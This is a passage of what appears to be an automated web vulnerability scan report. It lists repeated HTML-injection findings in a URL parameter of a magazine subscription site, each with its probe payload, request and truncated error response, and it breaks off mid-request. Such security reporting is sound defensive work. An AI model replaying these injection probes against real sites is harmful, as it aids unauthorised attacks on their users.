Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000uTCXbTRspSqOoVBK9qJuA9H:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:34 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "f6bac--><a b=c>5d7fa6913fa".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.34. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 98a7b--><a%20b%3dc>e817f1477cd was submitted in the REST URL parameter 5. This input was echoed as 98a7b--><a b=c>e817f1477cd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/98a7b--><a%20b%3dc>e817f1477cd HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:41 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ir9fxFpqoVwr9kJNJc3rKUj:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:21 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "98a7b--><a b=c>e817f1477cd".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.35. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 612e4--><a%20b%3dc>f2127e61cbe was submitted in the REST URL parameter 5. This input was echoed as 612e4--><a b=c>f2127e61cbe in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/612e4--><a%20b%3dc>f2127e61cbe HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:45 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000OqKWB-sdiPChufquVEMh4yT:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:25 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "612e4--><a b=c>f2127e61cbe".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.36. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 7f2df--><a%20b%3dc>6ff088f3d15 was submitted in the REST URL parameter 5. This input was echoed as 7f2df--><a b=c>6ff088f3d15 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/7f2df--><a%20b%3dc>6ff088f3d15 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:42 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Fo0eHqqs4Sg6z3MPvm8V-dQ:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:22 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "7f2df--><a b=c>6ff088f3d15".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.37. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload e55b9--><a%20b%3dc>6bef17208f7 was submitted in the REST URL parameter 5. This input was echoed as e55b9--><a b=c>6bef17208f7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/e55b9--><a%20b%3dc>6bef17208f7 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:00 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000LomihKZgw68WOC5OkKAIPsi:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:40 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "e55b9--><a b=c>6bef17208f7".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.38. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 3d40d--><a%20b%3dc>2d4dddff1d5 was submitted in the REST URL parameter 5. This input was echoed as 3d40d--><a b=c>2d4dddff1d5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/3d40d--><a%20b%3dc>2d4dddff1d5 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:50:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000c56eKoDBu92hjSoELRGTWsr:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:59:15 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "3d40d--><a b=c>2d4dddff1d5".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.39. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload a27bf--><a%20b%3dc>0a8804d8ed3 was submitted in the REST URL parameter 5. This input was echoed as a27bf--><a b=c>0a8804d8ed3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/a27bf--><a%20b%3dc>0a8804d8ed3 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000_WxbAG7s3OJ2_6Fk6JXUju6:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:24 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "a27bf--><a b=c>0a8804d8ed3".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.40. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 66710--><a%20b%3dc>39b0edb0aca was submitted in the REST URL parameter 5. This input was echoed as 66710--><a b=c>39b0edb0aca in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/66710--><a%20b%3dc>39b0edb0aca HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00004VMIyTRzQ7IDMHnnSCDahJm:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:16 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "66710--><a b=c>39b0edb0aca".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.41. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5ca12--><a%20b%3dc>f6176278517 was submitted in the REST URL parameter 5. This input was echoed as 5ca12--><a b=c>f6176278517 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5ca12--><a%20b%3dc>f6176278517 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:50:52 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000yWZkyQ2Dmp_a-WXP0Trg51H:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:59:43 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5ca12--><a b=c>f6176278517".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.42. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5d4f6--><a%20b%3dc>8f3f7215263 was submitted in the REST URL parameter 5. This input was echoed as 5d4f6--><a b=c>8f3f7215263 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5d4f6--><a%20b%3dc>8f3f7215263 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:18 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000OVEkfbp2STWkegj-zVaEMgL:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:09 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5d4f6--><a b=c>8f3f7215263".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.43. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 33edf--><a%20b%3dc>9be40c08234 was submitted in the REST URL parameter 5. This input was echoed as 33edf--><a b=c>9be40c08234 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/33edf--><a%20b%3dc>9be40c08234 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:28 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00002mq_okqRHeZ0pVVISJbxdFP:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:08 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "33edf--><a b=c>9be40c08234".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.44. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 38c81--><a%20b%3dc>91da38e0a93 was submitted in the REST URL parameter 5. This input was echoed as 38c81--><a b=c>91da38e0a93 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/38c81--><a%20b%3dc>91da38e0a93 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000I4weEx0LAIj5IojBYDzy4Ts:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:24 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "38c81--><a b=c>91da38e0a93".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.45. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 64966--><a%20b%3dc>cbecfd5019f was submitted in the REST URL parameter 5. This input was echoed as 64966--><a b=c>cbecfd5019f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/64966--><a%20b%3dc>cbecfd5019f HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:59 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00008zxEkjMG8qWSKz4ok6F1JV-:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:51 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "64966--><a b=c>cbecfd5019f".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.46. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 149e3--><a%20b%3dc>58e96b74057 was submitted in the REST URL parameter 5. This input was echoed as 149e3--><a b=c>58e96b74057 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/149e3--><a%20b%3dc>58e96b74057 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:52 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000rKgo6vzs-36_W-1g5D9HOMp:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:49 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "149e3--><a b=c>58e96b74057".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.47. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload bf9ef--><a%20b%3dc>c4c591cd110 was submitted in the REST URL parameter 5. This input was echoed as bf9ef--><a b=c>c4c591cd110 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/bf9ef--><a%20b%3dc>c4c591cd110 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
